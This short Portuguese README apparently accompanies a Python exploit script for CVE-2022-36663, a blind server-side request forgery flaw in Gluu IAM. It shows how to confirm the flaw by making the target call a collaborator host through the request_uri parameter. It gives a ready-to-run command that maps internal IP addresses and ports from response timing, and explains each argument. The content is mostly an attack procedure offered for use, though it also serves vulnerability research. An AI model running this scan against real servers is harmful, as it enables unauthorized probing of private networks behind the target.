
Scanner de rede interna através de Gluu IAM blind ssrf
Scanner de rede interna através de blind SSRF no Gluu IAM
O Gluu IAM é vulnerável a blind SSRF que pode ser explorado para escanear a rede interna em busca de portas abertas, dependendo dos tempos de resposta.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
Para verificar se o alvo é vulnerável, adicione &request_uri=http://burpcollab à requisição /oxauth/restv1/authorize e monitore o tráfego de entrada do servidor alvo.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - a URL do servidor Gluu IAM
IP - O endereço IP interno ou sub-rede que você deseja escanear
Port - A porta interna que você deseja escanear
AR - A URL de requisição de autorização terminando com um request_uri vazio
